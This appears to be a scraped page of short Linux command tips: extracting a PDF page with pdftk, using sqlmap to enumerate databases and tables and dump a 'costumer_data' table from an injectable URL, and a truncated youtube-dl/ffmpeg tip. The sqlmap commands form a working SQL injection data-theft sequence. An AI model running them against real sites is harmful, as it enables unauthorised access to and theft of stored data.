To install the program:
sudo apt-get install pdftk
To extract a page from an existing pdf file. For instance just the first page (A1):
pdftk A=/home/user/Desktop/cv.pdf cat A1 output outfile.pdf
sudo apt-get install pdftk
pdftk A=/home/user/Desktop/cv.pdf cat A1 output outfile.pdf
sudo apt-get install git git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev cd sqlmap-devTo list available options:
python sqlmap.py -hFetch database names of vulnerable url:
python sqlmap.py -u www.example.com/home.php?ID=10 --dbsEnumerate tables of a website's database (e.g.: test)
python sqlmap.py -u www.example.com/home.php?ID=10 -D test --tablesDump all data in database (test) and table (e.g.: costumer_data)
python sqlmap.py -u www.example.com/home.php?ID=10 -D test -T costumer_data --dumpMore examples are available here: https://gist.github.com/stamparm/5335217
First make you have both youtube-dl and ffmpeg installed: sudo apt install youtube-dl ffmpeg Then download a portion of your desired...